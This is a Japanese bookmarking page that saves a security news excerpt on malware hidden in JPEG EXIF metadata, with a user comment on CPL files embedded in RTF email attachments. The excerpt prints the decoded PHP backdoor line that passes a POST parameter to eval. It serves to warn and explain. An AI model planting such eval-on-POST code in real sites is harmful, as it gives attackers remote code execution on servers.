タグ

CPLに関するtsupoのブックマーク (1)

  • メタデータに埋め込まれたマルウエア

    今回は攻撃者による“だまし”に関するブログを中心に紹介する。最初は、JPEG画像のメタデータにマルウエアを仕込むケース。JPEG画像のメタデータにマルウエアを仕込んだPHPバックドアをスペインのドメイン(.es)で見つけたとして、ブログで注意を促している。同様の手口は、今年6月に米スキュリが報告している。 JPEGファイルのコードを見ると興味深い文字列が並んでおり、画像のEXIFデータと合致する。 JPEGファイルのコード 画像のEXIFデータ EXIFデータのModelo(モデル)情報とMarca(メーカー)情報に同じ文字列が確認できる。これを解読すると「if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"])); 」となり、POSTパラメータ「zz1」を通じて取得するいかなる数値も実行する。 コードの実行には、PHPの「ex

    メタデータに埋め込まれたマルウエア
    tsupo
    tsupo 2014/01/14
    画像のEXIFの「モデル情報」にPHPの実行コードを挿入する手口 / メールにZIP形式等のファイルではなく、コントロールパネル(CPL)ファイルが埋め込まれたRTF(リッチテキスト)を添付する手口
  • 1